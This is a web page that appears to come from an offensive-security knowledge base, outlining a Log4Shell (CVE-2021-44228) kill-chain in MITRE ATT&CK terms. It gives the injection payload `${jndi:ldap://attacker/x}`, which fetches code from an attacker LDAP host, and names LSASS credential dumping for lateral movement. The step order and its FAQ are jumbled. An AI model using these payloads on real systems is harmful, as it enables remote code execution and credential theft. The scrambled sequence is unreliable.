What starting position does this attack require?

The first step is Receive LDAP / DNS callback (T1190) — a initial access primitive. Assumed environment: target runs a Java app with log4j 2.

What is the final impact of this kill-chain?

The final step lands on Probe with `${jndi:ldap://collab}` payloads (CVE-LOG4SHELL), which falls under Execution. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

← RegistryDossier · 6 steps · 5 edges

Approved

Log4Shell (CVE-2021-44228) → RCE → lateral

Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.

Filed by AD Knowledge BasePublished 2026-05-26

§ Kill-chainDrag · zoom · scroll

Initial Access

Receive LDAP / DNS callback

T1190 · Exploit Public-Facing Application

Execution

Class loaded → arbitrary code

T1059 · Command and Scripting Interpreter

Reconnaissance

Identify Java app with logging

W-RECON-FINGERPRINT · Tech Stack Fingerprinting

Credential Access

LSASS / Linux creds + lateral movement

W-LSASS-PROCDUMP · LSASS via procdump / comsvcs.dll

Resource Development

Host malicious Java class on attacker LDAP

T1583 · Acquire Infrastructure

Execution

Probe with `${jndi:ldap://collab}` payloads

CVE-LOG4SHELL · Log4Shell (CVE-2021-44228)

§ Context

Assumed environment: target runs a Java app with log4j 2.x < 2.17 in the dependency tree. Egress from the app server to the internet (or attacker-controlled internal IP) on LDAP/HTTP.

§ Steps

01
Receive LDAP / DNS callbackInitial Access
T1190— Exploit Public-Facing Application
02
Class loaded → arbitrary codeExecution
T1059— Command and Scripting Interpreter
03
Identify Java app with loggingReconnaissance
W-RECON-FINGERPRINT— Tech Stack Fingerprinting
04
LSASS / Linux creds + lateral movementCredential Access
W-LSASS-PROCDUMP— LSASS via procdump / comsvcs.dll
05
Host malicious Java class on attacker LDAPResource Development
T1583— Acquire Infrastructure
06
Probe with `${jndi:ldap://collab}` payloadsExecution
CVE-LOG4SHELL— Log4Shell (CVE-2021-44228)

§ References

§ Frequently asked

What is the "Log4Shell (CVE-2021-44228) → RCE → lateral" attack path?: Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user. It chains 6 steps drawn from real-world offensive-security techniques.
What starting position does this attack require?: The first step is Receive LDAP / DNS callback (T1190) — a initial access primitive. Assumed environment: target runs a Java app with log4j 2.
What is the final impact of this kill-chain?: The final step lands on Probe with `${jndi:ldap://collab}` payloads (CVE-LOG4SHELL), which falls under Execution. From here, an operator typically pivots into post-exploitation or maintains persistence.
How can defenders detect or prevent this attack?: Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

Log4Shell (CVE-2021-44228) → RCE → lateral

§ Context

§ Steps

§ References

§ Frequently asked

§ Related dossiers

BYOVD → kernel-level disable of EDR callbacks

Squiblydoo: regsvr32 → remote SCT execution

EternalBlue (MS17-010) → SMBv1 wormable spread

Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach

Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat

F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB